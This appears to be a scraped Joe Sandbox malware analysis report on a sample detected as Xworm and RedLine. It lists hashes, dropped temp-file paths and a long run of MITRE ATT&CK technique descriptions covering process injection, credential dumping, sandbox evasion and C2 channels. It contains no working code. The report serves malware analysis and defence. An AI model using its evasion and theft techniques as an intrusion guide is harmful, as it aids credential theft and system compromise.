Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: a6314c18d5bdca4da2677537508ef7aba1785a73516202e3082c14c30a75d659
Instruction ID: 89fe1a4f6c2fe1e1c2fb2e28f8a6e488293e90a0e4288780ef1a20bf5d53ec57
Opcode Fuzzy Hash: a6314c18d5bdca4da2677537508ef7aba1785a73516202e3082c14c30a75d659
Instruction Fuzzy Hash: 35D0C2006050A412DB123B3928057FD2ACE9FC6368F0910ABB30A722938B540943A2B1

Function 00EDB199 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00EDA083,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000,00ED922F,-00008BE0), ref: 00EDB19C

Memory Dump Source

Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: ad7eb83f6d2d82b8e7f5d7b0ee973ae560e4f04b0dabb71402a49d295e270195
Instruction ID: b05fccd1ecca9d1bf7e1a7c054de30b5e5ee1b713f8db12b479244fba1122191
Opcode Fuzzy Hash: ad7eb83f6d2d82b8e7f5d7b0ee973ae560e4f04b0dabb71402a49d295e270195
Instruction Fuzzy Hash: DBA0223008000E8BCE002B30EE0800E3B20FB20BC030002E8A22BCF0B2CB23880BEB00

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report KR6CT3hIxT.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\r.exe.log

C:\Users\user\AppData\Local\Temp\3.exe

C:\Users\user\AppData\Local\Temp\4.exe

C:\Users\user\AppData\Local\Temp\r.exe

C:\Users\user\AppData\Local\Temp\rdegje.exe

C:\Users\user\AppData\Local\Temp\tmp2BA3.tmp

C:\Users\user\AppData\Local\Temp\tmp2BB4.tmp

C:\Users\user\AppData\Local\Temp\tmp2BC5.tmp

C:\Users\user\AppData\Local\Temp\tmp2BC6.tmp

C:\Users\user\AppData\Local\Temp\tmp2BD6.tmp

C:\Users\user\AppData\Local\Temp\tmp2BD7.tmp

C:\Users\user\AppData\Local\Temp\tmp2BE8.tmp

Windows Analysis Report
KR6CT3hIxT.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre